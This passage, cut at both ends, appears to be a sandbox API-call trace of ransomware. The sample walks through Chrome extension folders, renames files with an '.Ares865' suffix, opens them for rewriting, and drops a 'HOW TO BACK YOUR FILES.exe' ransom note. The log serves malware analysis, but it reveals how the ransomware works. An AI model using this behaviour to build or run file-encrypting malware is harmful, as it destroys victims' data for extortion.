Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.ares865"), dwFlags=0x1) returned 1 [0101.509] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.510] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=166) returned 1 [0101.514] lstrcpyW (in: lpString1=0x2cce514, lpString2="topbar_floating_button_pressed.png" | out: lpString1="topbar_floating_button_pressed.png") returned="topbar_floating_button_pressed.png" [0101.514] lstrlenW (lpString="topbar_floating_button_pressed.png") returned 34 [0101.514] lstrlenW (lpString="Ares865") returned 7 [0101.514] lstrcmpiW (lpString1="sed.png", lpString2="Ares865") returned 1 [0101.514] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.Ares865") returned 180 [0101.514] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.ares865"), dwFlags=0x1) returned 1 [0101.515] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.516] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=160) returned 1 [0101.521] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html" [0101.521] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html" [0101.521] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.521] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.522] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.522] GetLastError () returned 0x0 [0101.522] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.522] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8289e4a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e5e5f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e5e5f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.522] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.522] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.523] lstrcpyW (in: lpString1=0x2cce510, lpString2="craw_window.html" | out: lpString1="craw_window.html") returned="craw_window.html" [0101.523] lstrlenW (lpString="craw_window.html") returned 16 [0101.523] lstrlenW (lpString="Ares865") returned 7 [0101.523] lstrcmpiW (lpString1="ow.html", lpString2="Ares865") returned 1 [0101.523] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.Ares865") returned 160 [0101.523] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.ares865"), dwFlags=0x1) returned 1 [0101.524] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.524] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=810) returned 1 [0101.529] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css" [0101.530] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css" [0101.530] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.530] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.530] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.531] GetLastError () returned 0x0 [0101.531] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.531] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82896f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e5e5f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e5e5f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.531] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.531] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.531] lstrcpyW (in: lpString1=0x2cce50e, lpString2="craw_window.css" | out: lpString1="craw_window.css") returned="craw_window.css" [0101.531] lstrlenW (lpString="craw_window.css") returned 15 [0101.531] lstrlenW (lpString="Ares865") returned 7 [0101.531] lstrcmpiW (lpString1="dow.css", lpString2="Ares865") returned 1 [0101.531] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.Ares865") returned 158 [0101.531] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.ares865"), dwFlags=0x1) returned 1 [0101.533] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.533] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1741) returned 1 [0101.536] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi" [0101.536] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi" [0101.536] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.536] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.536] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.537] GetLastError () returned 0x0 [0101.537] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.537] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x862fc2f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e5e5f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e5e5f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.537] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.537] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.537] lstrcpyW (in: lpString1=0x2cce4f2, lpString2="1.4_0" | out: lpString1="1.4_0") returned="1.4_0" [0101.537] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7cc8 [0101.537] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xfe) returned 0x31afc8 [0101.537] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cd0 | out: ListHead=0x2e7710, ListEntry=0x2e7cd0) returned 0x2e7a90 [0101.537] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e5e5f40, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4e5e5f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0101.537] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0101.537] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e5e5f40, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4e5e5f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0101.537] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0101.538] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cd0 [0101.538] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0" [0101.538] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0" [0101.538] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.538] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.538] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.539] GetLastError () returned 0x0 [0101.539] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.539] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85dd4d90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e60c0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e60c0a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.539] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.539] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.539] lstrcpyW (in: lpString1=0x2cce4fe, lpString2="128.png" | out: lpString1="128.png") returned="128.png" [0101.539] lstrlenW (lpString="128.png") returned 7 [0101.539] lstrlenW (lpString="Ares865") returned 7 [0101.539] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.Ares865") returned 142 [0101.539] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.ares865"), dwFlags=0x1) returned 1 [0101.541] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.541] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4984) returned 1 [0101.545] lstrcpyW (in: lpString1=0x2cce4fe, lpString2="contentscript_bin_prod.js" | out: lpString1="contentscript_bin_prod.js") returned="contentscript_bin_prod.js" [0101.545] lstrlenW (lpString="contentscript_bin_prod.js") returned 25 [0101.545] lstrlenW (lpString="Ares865") returned 7 [0101.545] lstrcmpiW (lpString1="prod.js", lpString2="Ares865") returned 1 [0101.545] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.Ares865") returned 160 [0101.545] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.ares865"), dwFlags=0x1) returned 1 [0101.548] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User 